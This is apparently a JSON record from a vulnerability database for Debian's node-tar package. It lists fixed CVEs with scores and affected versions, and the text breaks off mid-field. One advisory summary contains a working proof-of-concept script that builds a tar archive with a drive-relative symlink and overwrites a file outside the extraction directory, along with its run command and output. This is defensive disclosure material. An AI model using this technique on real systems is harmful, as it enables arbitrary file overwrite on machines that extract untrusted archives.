{"url":"http://public2.vulnerablecode.io/api/packages/932655?format=json","purl":"pkg:deb/debian/node-tar@0?distro=trixie","type":"deb","namespace":"debian","name":"node-tar","version":"0","qualifiers":{"distro":"trixie"},"subpath":"","is_vulnerable":false,"next_non_vulnerable_version":"2.2.1-1","latest_non_vulnerable_version":"6.2.1+ds1+~cs6.1.13-10","affected_by_vulnerabilities":[],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22177?format=json","vulnerability_id":"VCID-3ctc-sy35-yba5","summary":"node-tar has a race condition leading to uninitialized memory exposure\nUsing `.t` (aka `.list`) with `{ sync: true }` to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-64118.json","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-64118.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64118","reference_id":"","reference_type":"","scores":[{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00134","published_at":"2026-04-08T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00196","published_at":"2026-04-29T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.0019","published_at":"2026-04-09T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00192","published_at":"2026-04-13T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00194","published_at":"2026-04-18T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00198","published_at":"2026-04-26T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64118"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/isaacs/node-tar","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/isaacs/node-tar"},{"reference_url":"https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-30T18:41:54Z/"}],"url":"https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d"},{"reference_url":"https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9"},{"reference_url":"https://github.com/isaacs/node-tar/issues/445","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-30T18:41:54Z/"}],"url":"https://github.com/isaacs/node-tar/issues/445"},{"reference_url":"https://github.com/isaacs/node-tar/pull/446","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-30T18:41:54Z/"}],"url":"https://github.com/isaacs/node-tar/pull/446"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2407440","reference_id":"2407440","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2407440"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64118","reference_id":"CVE-2025-64118","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64118"},{"reference_url":"https://github.com/advisories/GHSA-29xp-372q-xqph","reference_id":"GHSA-29xp-372q-xqph","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-29xp-372q-xqph"},{"reference_url":"https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph","reference_id":"GHSA-29xp-372q-xqph","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-30T18:41:54Z/"}],"url":"https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932655?format=json","purl":"pkg:deb/debian/node-tar@0?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932648?format=json","purl":"pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-fqmy-jhdk-xfhw"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-qunt-xms1-a3cc"},{"vulnerability":"VCID-xqpk-t1d2-yqak"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932646?format=json","purl":"pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-fqmy-jhdk-xfhw"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.1.13%252B~cs7.0.5-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932650?format=json","purl":"pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252B~cs7.0.8-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932649?format=json","purl":"pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252Bds1%252B~cs6.1.13-10%3Fdistro=trixie"}],"aliases":["CVE-2025-64118","GHSA-29xp-372q-xqph"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3ctc-sy35-yba5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11154?format=json","vulnerability_id":"VCID-m4hj-dq8q-67f6","summary":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\nThe npm package \"tar\" (aka node-tar) has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37713.json","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37713.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37713","reference_id":"","reference_type":"","scores":[{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54636","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54563","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54633","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54656","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54626","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54678","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54674","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54687","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54671","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54649","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54689","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54668","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54639","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54657","published_at":"2026-04-26T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37713"},{"reference_url":"https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/isaacs/node-tar/commit/52b09e309bcae0c741a7eb79a17ef36e7828b946","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/isaacs/node-tar/commit/52b09e309bcae0c741a7eb79a17ef36e7828b946"},{"reference_url":"https://github.com/isaacs/node-tar/commit/82eac952f7c10765969ed464e549375854b26edc","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/isaacs/node-tar/commit/82eac952f7c10765969ed464e549375854b26edc"},{"reference_url":"https://github.com/isaacs/node-tar/commit/875a37e3ec031186fc6599f6807341f56c584598","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/isaacs/node-tar/commit/875a37e3ec031186fc6599f6807341f56c584598"},{"reference_url":"https://github.com/npm/node-tar","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/npm/node-tar"},{"reference_url":"https://www.npmjs.com/package/tar","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/package/tar"},{"reference_url":"https://www.oracle.com/security-alerts/cpuoct2021.html","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.oracle.com/security-alerts/cpuoct2021.html"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2033394","reference_id":"2033394","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2033394"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37713","reference_id":"CVE-2021-37713","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37713"},{"reference_url":"https://github.com/advisories/GHSA-5955-9wpr-37jh","reference_id":"GHSA-5955-9wpr-37jh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5955-9wpr-37jh"},{"reference_url":"https://github.com/npm/node-tar/security/advisories/GHSA-5955-9wpr-37jh","reference_id":"GHSA-5955-9wpr-37jh","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/npm/node-tar/security/advisories/GHSA-5955-9wpr-37jh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932655?format=json","purl":"pkg:deb/debian/node-tar@0?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932648?format=json","purl":"pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-fqmy-jhdk-xfhw"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-qunt-xms1-a3cc"},{"vulnerability":"VCID-xqpk-t1d2-yqak"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932646?format=json","purl":"pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-fqmy-jhdk-xfhw"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.1.13%252B~cs7.0.5-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932650?format=json","purl":"pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252B~cs7.0.8-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932649?format=json","purl":"pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252Bds1%252B~cs6.1.13-10%3Fdistro=trixie"}],"aliases":["CVE-2021-37713","GHSA-5955-9wpr-37jh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m4hj-dq8q-67f6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/24011?format=json","vulnerability_id":"VCID-qunt-xms1-a3cc","summary":"node-tar Symlink Path Traversal via Drive-Relative Linkpath\n### Summary\n`tar` (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as `C:../../../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.\n\n### Details\nThe extraction logic in `Unpack[STRIPABSOLUTEPATH]` validates `..` segments against a resolved path that still uses the original drive-relative value, and only afterwards rewrites the stored `linkpath` to the stripped value.\n\nWhat happens with `linkpath: \"C:../../../target.txt\"`:\n1. `stripAbsolutePath()` removes `C:` and rewrites the value to `../../../target.txt`.\n2. The escape check resolves using the original pre-stripped value, so it is treated as in-bounds and accepted.\n3. Symlink creation uses the rewritten value (`../../../target.txt`) from nested path `a/b/l`.\n4. Writing through the extracted symlink overwrites the outside file (`../target.txt`).\n\nThis is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.\n\n### PoC\nTested on Arch Linux with `tar@7.5.10`.\n\nPoC script (`poc.cjs`):\n\n```js\nconst fs = require('fs')\nconst path = require('path')\nconst { Header, x } = require('tar')\n\nconst cwd = process.cwd()\nconst target = path.resolve(cwd, '..', 'target.txt')\nconst tarFile = path.join(cwd, 'poc.tar')\n\nfs.writeFileSync(target, 'ORIGINAL\\n')\n\nconst b = Buffer.alloc(1536)\nnew Header({\n  path: 'a/b/l',\n  type: 'SymbolicLink',\n  linkpath: 'C:../../../target.txt',\n}).encode(b, 0)\nfs.writeFileSync(tarFile, b)\n\nx({ cwd, file: tarFile }).then(() => {\n  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\\n')\n  process.stdout.write(fs.readFileSync(target, 'utf8'))\n})\n```\n\nRun:\n\n```bash\nnode poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt\n```\n\nObserved output:\n\n```text\nPWNED\n../../../target.txt\nlrwxrwxrwx - joshuavr  7 Mar 18:37 󰡯 a/b/l -> ../../../target.txt\n.rw-r--r-- 6 joshuavr  7 Mar 18:37  ../target.txt\n```\n\n`PWNED` confirms outside file content overwrite. `readlink` and `ls -l` confirm the extracted symlink points outside the extraction directory.\n\n### Impact\nThis is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.\n\nRealistic scenarios:\n- CLI tools unpacking untrusted tarballs into a working directory\n- build/update pipelines consuming third-party archives\n- services that import user-supplied tar files","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31802.json","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31802.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31802","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00472","published_at":"2026-04-07T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00481","published_at":"2026-04-02T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00467","published_at":"2026-04-09T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00477","published_at":"2026-04-04T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.0047","published_at":"2026-04-08T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00658","published_at":"2026-04-16T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00663","published_at":"2026-04-18T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00665","published_at":"2026-04-13T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00706","published_at":"2026-04-29T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00664","published_at":"2026-04-12T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00671","published_at":"2026-04-11T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00707","published_at":"2026-04-26T12:55:00Z"},{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00705","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31802"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31802","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31802"},{"reference_url":"https://github.com/isaacs/node-tar","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/isaacs/node-tar"},{"reference_url":"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:56:31Z/"}],"url":"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad"},{"reference_url":"https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:56:31Z/"}],"url":"https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31802","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31802"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2445881","reference_id":"2445881","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2445881"},{"reference_url":"https://github.com/advisories/GHSA-9ppj-qmqm-q256","reference_id":"GHSA-9ppj-qmqm-q256","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9ppj-qmqm-q256"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932655?format=json","purl":"pkg:deb/debian/node-tar@0?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932648?format=json","purl":"pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-fqmy-jhdk-xfhw"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-qunt-xms1-a3cc"},{"vulnerability":"VCID-xqpk-t1d2-yqak"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1088710?format=json","purl":"pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u3?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u3%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932646?format=json","purl":"pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-fqmy-jhdk-xfhw"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.1.13%252B~cs7.0.5-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932650?format=json","purl":"pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5wr3-7131-u3aa"},{"vulnerability":"VCID-bj4b-gq5e-2kfy"},{"vulnerability":"VCID-jj22-rfbv-bkg3"},{"vulnerability":"VCID-yy79-dbn9-7bd5"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252B~cs7.0.8-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932649?format=json","purl":"pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252Bds1%252B~cs6.1.13-10%3Fdistro=trixie"}],"aliases":["CVE-2026